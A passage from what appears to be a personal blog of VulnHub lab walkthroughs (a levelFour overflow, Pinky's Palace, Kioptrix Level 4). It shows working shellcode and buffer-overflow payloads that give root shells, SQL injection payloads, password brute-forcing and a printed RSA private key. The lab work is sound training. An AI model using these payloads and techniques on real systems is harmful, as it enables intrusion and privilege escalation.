Buf: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Segmentation fault

In GDB:

Program received signal SIGSEGV, Segmentation fault.
0x62413961 in ?? ()

(gdb) info frame
Stack level 0, frame at 0xffffd9b4:
eip = 0x62413961; saved eip = 0x31624130
called by frame at 0xffffd9b8
Arglist at 0xffffd9ac, args:
Locals at 0xffffd9ac, Previous frame’s sp is 0xffffd9b4
Saved registers:
eip at 0xffffd9b0

level3@kali:/home/level3$ /usr/bin/msf-pattern_offset -q 62413961
Rails Error: Unable to access log file. Please ensure that /home/level0/.msf4/logs/production.log exists and is writable (ie, make it writable for user and group: chmod 0664 /home/level0/.msf4/logs/production.log). The log level has been raised to WARN and the output directed to STDERR until the problem is fixed.
[*] Exact match at offset 28

Creating exploit:

import struct
pad = “\x41” *28
EIP = struct.pack(“I”,0xffffd9b4)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
print pad + EIP + NOP + shellcode

level3@kali:/home/level3$ ./levelFour $(python test.py)
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1۰̀Sh/ttyh/dev��1�f�’�̀1�Ph//shh/bin��PS�ᙰ

$ id
uid=1004(level4) gid=1000(level0) groups=1000(level0)

cat level4.txt
f633cbb8f6a7ca2e0ac216b1dc2ad57a

Still having issue with the last level…. update to follow!

Pinky v1.225

This one was a fun box.. My second with a buffer overflow… I cheated a bit to take some shortcuts.. Trying to find a more efficient way than using gdb… I will publish the method I built using examples I found elsewhere such as https://blaksec.com

First:

Searching for the target:
nmap -Pn -T4 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 12:59 UTC
Nmap scan report for 192.168.56.100
Host is up (0.000096s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:58:FD:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
MAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)

Running Interlace (First time, I wanted to try this…. it’s an automated nmap) for multiple targets/scopes) while investigating ports 8080 and 31337:
Commande:
interlace -tL /root/boxes/pinky/targets.txt -o /root/boxes/pinky/output -cL /root/boxes/pinky/commands.txt -threads 20
Commands.txt:
nmap -Pn -sC -sV -oN _output_/_target_-initial.txt _target_
nmap -Pn -p- -oN _output_/_target_-tcp-allports.txt _target_
nmap -Pn -sU –top-ports 50 -oN _output_/_target_-udp-top50.txt _target_
targets.txt:
192.168.56.101

A few more results:
cat 192.168.56.101-tcp-allports.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -p- -oN /root/boxes/pinky/output/192.168.56.101-tcpallports.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
64666/tcp open unknown

cat 192.168.56.101-udp-top50.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -sU –top-ports 50 -oN /root/boxes/pinky/output/
192.168.56.101-udp-top50.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
Not shown: 49 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc

 

Trying to connect:

telnet 192.168.56.101 64666

Trying 192.168.56.101…
Connected to 192.168.56.101.
Escape character is ‘^]’.
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
ls
Protocol mismatch.
Connection closed by foreign host.
Port 8080 returns 403 error and nginx/1.10.3
Port 313337 returns ERROR The requested URL ould not be retrieved

But with: squid/3.5.23

Did a searchsploit but it returned nothing good
Running dirbuster on 8080 and 31337:
Nothing for 8080
31337 returns I/O Errors

Trying to connect to port 64666 using burp:
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
Protocol mismatch.
Trying to connect:
ssh 192.168.56.101 -p 64666
The authenticity of host ‘[192.168.56.101]:64666 ([192.168.56.101]:64666)’ can’t be established.
ECDSA key fingerprint is SHA256:V5qJjz+sQ8RoowMS4sNiH5d8pNwt6ayyKI68H2twYEo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[192.168.56.101]:64666’ (ECDSA) to the list of known hosts.
root@192.168.56.101’s password:
Permission denied, please try again.

So Back to SQUID….
Trying to use a proxy to connect with the target localhost:
curl http://127.0.0.1:8080 -x 192.168.56.101:31337
<html>
<head>
<title>Pinky’s HTTP File Server</title>
</head>
<body>
<center><h1>Pinky’s HTTP File Server</h1></center>
<center><h3>Under Development!</h3></center>
</body>
<style>
html{
background: #f74bff;
}

It works…

So now we know we can use dirb:
dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-lowercase-2.3-medium.txt -p 192.168.56.101:31337
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Tue Jul 16 15:40:03 2019
URL_BASE: http://127.0.0.1:8080/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
PROXY: 192.168.56.101:31337
—————–
GENERATED WORDS: 87568
—- Scanning URL: http://127.0.0.1:8080/ —-
==> DIRECTORY: http://127.0.0.1:8080/littlesecrets-main/
—- Entering directory: http://127.0.0.1:8080/littlesecrets-main/ —-
—————–
END_TIME: Tue Jul 16 15:43:45 2019
DOWNLOADED: 175136 – FOUND: 0
So let’s curl it:
curl http://127.0.0.1:8080/littlesecrets-main/ -x 192.168.56.101:31337
html>
<head>
<title>Login</title>
</head>
<body>
<center>
<div class=”titlelog”>
<h1>Pinky’s Admin Files Login</h1>
</div>
</center>
<center>
<div class=”log”>
<form action=”login.php” method=”post”>
<h3>User:</h3>
<input type=”text” name=”user”/>
<h3>Password:</h3>
<input type=”password” name=”pass”/>
<input type=”submit” value=”Login”/>
</form>
</div>
</center>
</body>
<style>
html{
background: #f74bff;
}
</style>
<!– Luckily I only allow localhost access to my webserver! Now I won’t get hacked. –>
</html>
Funny!!!!!!

 

Found also logs.php logging every login attempt into a DB… so…

Running SQLMAP:
sqlmap –proxy=http://192.168.56.101:31337 –dbms=mysql –data=”user=admin&pass=password&submit=Login” –url
http://127.0.0.1:8080/littlesecrets-main/login.php –level=5 –risk=3 –dump users

Password: 3pinkysaf33pinkysaf3

So login:

ssh -l pinkymanage -p 64666 192.168.56.101
pinkymanage@192.168.56.101’s password:
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 2 04:00:51 2018 from 127.0.0.1

pinkymanage@pinkys-palace:~$
Nothing in the user home.
Cannot access pinky user home

So moving to /tmp
Trying to copy linenum.sh …. didn’t work.. Maybe my network config
So good old cut and paste!
Then
./enum.sh -t > enum.txt

Also checking var directory:
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ll
total 16
drwxr-xr-x 2 root root 4096 Feb 2 2018 .
drwxr-xr-x 3 root root 4096 Feb 2 2018 ..
-rw-r–r– 1 root root 99 Feb 2 2018 note.txt
-rw-r–r– 1 root root 2270 Feb 2 2018 .ultrasecret
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35

$ cat note.txt
Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35

$ cat .ultrasecret
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMTZmeEwzLyto
L0lMVFpld2t2ZWtoSVExeWswb0xJK3kzTjRBSXRraGV6MTFJaGE4CkhjN0tPeC9MOWcyamQzSDhk
R1BVZktLcjlzZXF0Zzk3WktBOTVTL3NiNHczUXRsMUFCdS9wVktaQmJHR3NIRy8KeUl2R0VQS1Mr
QlNaNHN0TVc3SG54N2NpTXVod2Nad0xxWm1zeVN1bUVDVHVlUXN3TlBibElUbHJxb2xwWUY4eApl
NDdFbDlwSHdld05XY0lybXFyYXhDSDVUQzdVaGpnR2FRd21XM3FIeXJTcXAvaksvY3RiMVpwblB2
K0RDODMzCnUvVHlqbTZ6OFJhRFpHL2dSQklyTUduTmJnNHBaRmh0Z2JHVk9mN2ZlR3ZCRlI4QmlU
KzdWRmZPN3lFdnlCeDkKZ3hyeVN4dTJaMGFPTThRUjZNR2FETWpZVW5COWFUWXV3OEdQNHdJREFR
QUJBb0lCQUE2aUg3U0lhOTRQcDRLeApXMUx0cU9VeEQzRlZ3UGNkSFJidG5YYS80d3k0dzl6M1Mv
WjkxSzBrWURPbkEwT1VvWHZJVmwvS3JmNkYxK2lZCnJsZktvOGlNY3UreXhRRXRQa291bDllQS9r
OHJsNmNiWU5jYjNPbkRmQU9IYWxYQVU4TVpGRkF4OWdrY1NwejYKNkxPdWNOSUp1eS8zUVpOSEZo
TlIrWVJDb0RLbkZuRUlMeFlMNVd6MnFwdFdNWUR1d3RtR3pPOTY4WWJMck9WMQpva1dONmdNaUVp
NXFwckJoNWE4d0JSUVZhQnJMWVdnOFdlWGZXZmtHektveEtQRkt6aEk1ajQvRWt4TERKcXQzCkxB
N0pSeG1Gbjc3L21idmFEVzhXWlgwZk9jUzh1Z3lSQkVOMFZwZG5GNmtsNnRmT1hLR2owZ2QrZ0Fp
dzBUVlIKMkNCN1BzRUNnWUVBOElXM1pzS3RiQ2tSQnRGK1ZUQnE0SzQ2czdTaFc5QVo2K2JwYitk
MU5SVDV4UkpHK0RzegpGM2NnNE4rMzluWWc4bUZ3c0Jobi9zemdWQk5XWm91V3JSTnJERXhIMHl1
NkhPSjd6TFdRYXlVaFFKaUlQeHBjCm4vRWVkNlNyY3lTZnpnbW50T2liNGh5R2pGMC93bnRqTWM3
M3h1QVZOdU84QTZXVytoZ1ZIS0VDZ1lFQTVZaVcKSzJ2YlZOQnFFQkNQK3hyQzVkSE9CSUVXdjg5
QkZJbS9Gcy9lc2g4dUU1TG5qMTFlUCsxRVpoMkZLOTJReDlZdgp5MWJNc0FrZitwdEZVSkxjazFN
MjBlZkFhU3ZPaHI1dWFqbnlxQ29mc1NVZktaYWE3blBRb3plcHFNS1hHTW95Ck1FRWVMT3c1NnNK
aFNwMFVkWHlhejlGUUFtdnpTWFVudW8xdCtnTUNnWUVBdWJ4NDJXa0NwU0M5WGtlT3lGaGcKWUdz
TE45VUlPaTlrcFJBbk9seEIzYUQ2RkY0OTRkbE5aaFIvbGtnTTlzMVlPZlJYSWhWbTBaUUNzOHBQ
RVZkQQpIeDE4ci8yRUJhV2h6a1p6bGF5ci9xR29vUXBwUkZtbUozajZyeWZCb21RbzUrSDYyVEE3
bUl1d3Qxb1hMNmM2Ci9hNjNGcVBhbmcyVkZqZmNjL3IrNnFFQ2dZQStBenJmSEZLemhXTkNWOWN1
ZGpwMXNNdENPRVlYS0QxaStSd2gKWTZPODUrT2c4aTJSZEI1RWt5dkprdXdwdjhDZjNPUW93Wmlu
YnErdkcwZ016c0M5Sk54SXRaNHNTK09PVCtDdwozbHNLeCthc0MyVng3UGlLdDh1RWJVTnZEck9Y
eFBqdVJJbU1oWDNZU1EvVUFzQkdSWlhsMDUwVUttb2VUSUtoClNoaU9WUUtCZ1FEc1M0MWltQ3hX
Mm1lNTQxdnR3QWFJcFE1bG81T1Z6RDJBOXRlRVBzVTZGMmg2WDdwV1I2SVgKQTlycExXbWJmeEdn
SjBNVmh4Q2pwZVlnU0M4VXNkTXpOYTJBcGN3T1dRZWtORTRlTHRPN1p2MlNWRHI2Y0lyYwpIY2NF
UCtNR00yZVVmQlBua2FQa2JDUHI3dG5xUGY4ZUpxaVFVa1dWaDJDbll6ZUFIcjVPbUE9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

The = at the end makes me thinks it’s a Base64 encoded

Decoded: base64 -d .ultrasecret >/tmp/ssh.key
—–BEGIN RSA PRIVATE KEY—–
MIIEpAIBAAKCAQEA16fxL3/+h/ILTZewkvekhIQ1yk0oLI+y3N4AItkhez11Iha8
Hc7KOx/L9g2jd3H8dGPUfKKr9seqtg97ZKA95S/sb4w3Qtl1ABu/pVKZBbGGsHG/
yIvGEPKS+BSZ4stMW7Hnx7ciMuhwcZwLqZmsySumECTueQswNPblITlrqolpYF8x
e47El9pHwewNWcIrmqraxCH5TC7UhjgGaQwmW3qHyrSqp/jK/ctb1ZpnPv+DC833
u/Tyjm6z8RaDZG/gRBIrMGnNbg4pZFhtgbGVOf7feGvBFR8BiT+7VFfO7yEvyBx9
gxrySxu2Z0aOM8QR6MGaDMjYUnB9aTYuw8GP4wIDAQABAoIBAA6iH7SIa94Pp4Kx
W1LtqOUxD3FVwPcdHRbtnXa/4wy4w9z3S/Z91K0kYDOnA0OUoXvIVl/Krf6F1+iY
rlfKo8iMcu+yxQEtPkoul9eA/k8rl6cbYNcb3OnDfAOHalXAU8MZFFAx9gkcSpz6
6LOucNIJuy/3QZNHFhNR+YRCoDKnFnEILxYL5Wz2qptWMYDuwtmGzO968YbLrOV1
okWN6gMiEi5qprBh5a8wBRQVaBrLYWg8WeXfWfkGzKoxKPFKzhI5j4/EkxLDJqt3
LA7JRxmFn77/mbvaDW8WZX0fOcS8ugyRBEN0VpdnF6kl6tfOXKGj0gd+gAiw0TVR
2CB7PsECgYEA8IW3ZsKtbCkRBtF+VTBq4K46s7ShW9AZ6+bpb+d1NRT5xRJG+Dsz
F3cg4N+39nYg8mFwsBhn/szgVBNWZouWrRNrDExH0yu6HOJ7zLWQayUhQJiIPxpc
n/Eed6SrcySfzgmntOib4hyGjF0/wntjMc73xuAVNuO8A6WW+hgVHKECgYEA5YiW
K2vbVNBqEBCP+xrC5dHOBIEWv89BFIm/Fs/esh8uE5Lnj11eP+1EZh2FK92Qx9Yv
y1bMsAkf+ptFUJLck1M20efAaSvOhr5uajnyqCofsSUfKZaa7nPQozepqMKXGMoy
MEEeLOw56sJhSp0UdXyaz9FQAmvzSXUnuo1t+gMCgYEAubx42WkCpSC9XkeOyFhg
YGsLN9UIOi9kpRAnOlxB3aD6FF494dlNZhR/lkgM9s1YOfRXIhVm0ZQCs8pPEVdA
Hx18r/2EBaWhzkZzlayr/qGooQppRFmmJ3j6ryfBomQo5+H62TA7mIuwt1oXL6c6
/a63FqPang2VFjfcc/r+6qECgYA+AzrfHFKzhWNCV9cudjp1sMtCOEYXKD1i+Rwh
Y6O85+Og8i2RdB5EkyvJkuwpv8Cf3OQowZinbq+vG0gMzsC9JNxItZ4sS+OOT+Cw
3lsKx+asC2Vx7PiKt8uEbUNvDrOXxPjuRImMhX3YSQ/UAsBGRZXl050UKmoeTIKh
ShiOVQKBgQDsS41imCxW2me541vtwAaIpQ5lo5OVzD2A9teEPsU6F2h6X7pWR6IX
A9rpLWmbfxGgJ0MVhxCjpeYgSC8UsdMzNa2ApcwOWQekNE4eLtO7Zv2SVDr6cIrc
HccEP+MGM2eUfBPnkaPkbCPr7tnqPf8eJqiQUkWVh2CnYzeAHr5OmA==
—–END RSA PRIVATE KEY—–

Now I can login as pinky:
pinkymanage@pinkys-palace:/tmp$ ssh -l pinky -i /tmp/ssh.key -p 64666 192.168.56.101
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Fri Feb 2 05:54:01 2018 from 172.19.19.2

Interesting exe:
ll
total 44
drwx—— 3 pinky pinky 4096 Jul 22 16:03 .
drwxr-xr-x 4 root root 4096 Feb 2 2018 ..
-rwsr-xr-x 1 root root 8880 Feb 2 2018 adminhelper
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r–r– 1 pinky pinky 220 Jan 28 2018 .bash_logout
-rw-r–r– 1 pinky pinky 3526 Jul 22 16:03 .bashrc
lrwxrwxrwx 1 pinky pinky 9 Feb 1 2018 .mysql_history -> /dev/null
-rw-r–r– 1 root root 280 Feb 2 2018 note.txt
-rw-r–r– 1 pinky pinky 675 Jan 28 2018 .profile
drwx—— 2 pinky pinky 4096 Feb 2 2018 .ssh
-rw——- 1 pinky pinky 2879 Jul 22 16:03 .viminfo

pinky@pinkys-palace:~$ cat note.txt
Been working on this program to help me when I need to do administrator tasks sudo is just too hard to configure and I can
never remember my root password! Sadly I’m fairly new to C so I was working on my printing skills because Im not sure how
to implement shell spawning yet 🙁

pinky@pinkys-palace:~$ ./adminhelper
pinky@pinkys-palace:~$ ./adminhelper sss
sss

It has a SUID and takes arguments… Let’s try to overflow it
pinky@pinkys-palace:~$ ./adminhelper $(python -c ‘print “A” *300’)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Bingo!

Now let’s try to exploit it:

Crash it to verify buffer overflow.

Find where it’s crashing – This is what I will explain later….. I need to make progress on this part… I could do it but not explain it properly.

then:
export MYEGG=$(python -c ‘print(“\x90” * 100 +
“\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”)’)
pinky@pinkys-palace:~$ echo $MYEGG

Let’s find the crash address:

vi getMYEGGAddr.c

#include <stdlib.h>
int main()
{
char *addr;
addr = getenv(“MYEGG”);
printf(“MYEGG is at %p\n”, addr);
exit(0);
}

gcc getMYEGGAddr.c -o getMYEGGAddr
getMYEGGAddr.c: In function ‘main’:
getMYEGGAddr.c:11:5: warning: implicit declaration of function ‘printf’ [-Wimplicit-function-declaration]
printf(“MYEGG is at %p\n”, addr);
^~~~~~
getMYEGGAddr.c:11:5: warning: incompatible implicit declaration of built-in function ‘printf’
getMYEGGAddr.c:11:5: note: include ‘<stdio.h>’ or provide a declaration of ‘printf’

pinky@pinkys-palace:/tmp$ ./getMYEGGAddr
MYEGG is at 0x7fffffffef58
./adminhelper $(python -c ‘print(“A” * 72 + “\x7f\xff\xff\xff\xef\x58″[::-1])’)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
# id
uid=1000(pinky) gid=1000(pinky) euid=0(root) groups=1000(pinky),24(cdrom),25(floppy),29(audio),30(dip),44(video),
46(plugdev),108(netdev)
# whoami
root
# alias ll=”ls -al”
cd /root
# ll
total 40
drwx—— 3 root root 4096 Mar 5 2018 .
drwxr-xr-x 22 root root 4096 Jan 28 2018 ..
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r–r– 1 root root 570 Jan 31 2010 .bashrc
lrwxrwxrwx 1 root root 9 Feb 2 2018 .mysql_history -> /dev/null
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
drwx—— 2 root root 4096 Feb 2 2018 .ssh
-rw——- 1 root root 14803 Mar 5 2018 .viminfo
-rw-r–r– 1 root root 207 Mar 5 2018 root.txt
# cat root.txt
===========[!!!CONGRATS!!!]===========
[+] You r00ted Pinky’s Palace Intermediate!
[+] I hope you enjoyed this box!
[+] Cheers to VulnHub!
[+] Twitter: @Pink_P4nther
Flag: 99975cfc5e2eb4c199d38d4a2b2c03ce

 

Thanks @Pink_P4nther for the box… Lot of fun…

And thanks @vulnhub!!!!!!! A big part of my training!

 

See you for the next box and the Buffer Overflow walthrough.. Almost done writing it for 32 and 64 bits… My most challenging exercise for now!

Kioptrix Level 4

Starting with a quick scan:

nmap -Pn -T4 192.168.79.0/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-06 08:48 ADT
Nmap scan report for 192.168.79.217
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CF:86:2E (VMware)

My goal today is to do this box as fast as possible.

Going to the webpage:

Running Nikto:

nikto -host http://192.168.79.217 -output nikto.txt
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.79.217
+ Target Hostname: 192.168.79.217
+ Target Port: 80
+ Start Time: 2019-06-06 08:52:20 (GMT-3)
—————————————————————————
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fas
hion to the MIME type
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.i
t/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current relea
se for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 07:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2019-06-06 08:52:34 (GMT-3) (14 seconds)
—————————————————————————

Then gobuster:

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.79.217 -o gobuster.txt

/index (Status: 200)
/images (Status: 301)
/member (Status: 302)
/logout (Status: 302)
/john (Status: 301)
/robert (Status: 301)
/server-status (Status: 403)

While it’s running, I send the page to Burp:

POST /checklogin.php HTTP/1.1
Host: 192.168.79.217
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.79.217/

Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: PHPSESSID=cca8c9b6b000df9f7870bbf98bdba878
Connection: close
Upgrade-Insecure-Requests: 1

myusername=erik&mypassword=erik&Submit=Login

Response:

HTTP/1.1 200 OK
Date: Thu, 06 Jun 2019 08:59:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Content-Length: 109
Connection: close
Content-Type: text/html

Wrong Username or Password<form method=”link” action=”index.php”><input type=submit value=”Try Again”></form>

Not much there

Scanning for SMB vuln:

nmap -p 445 -vv –script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.79.217

PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

Nothing

running dotdotpwn (Directory traversal) in the meantime and intruder on Burp for SQL injection.

Scanning SMB shares:

nmap -p 445 -vv –script=smb-enum-shares.nse,smb-enum-users.nse 192.168.79.217

PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.79.217\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.79.217\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Maybe something.

smbclient //192.168.79.217/IPC$
Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \> dir
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

Nothing there

Trying Null connect
rpcclient -U "" 192.168.79.217

Seems to be working.
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

We now have a list of users!

We can start to trying cracking the password:

wfuzz -w /usr/share/seclists/Passwords/darkc0de.txt -d “myusername=john&mypassword=FUZZ&Submit=Login” –hc 200 -u http://192.168.79.217

Also trying hydra on ssh:
hydra -l john -P darkc0de.txt 192.168.79.217 ssh

Both returned nothing

Trying sqlmap:

sqlmap –level 3 –risk 3 -u http://192.168.79.217/checklogin.php –data “myusername=erik&mypassword=password&Submit=Login” –method POST –dbms MYSQL

[11:45:49] [INFO] checking if the injection point on POST parameter ‘mypassword’ is a false positive
POST parameter ‘mypassword’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2297 HTTP(s) requests:

Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause
Payload: myusername=erik&mypassword=-4226′ OR 5600=5600– bMfZ&Submit=Login

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: myusername=erik&mypassword=password’ OR SLEEP(5)– WzXE&Submit=Login

[11:46:01] [INFO] the back-end DBMS is MySQL
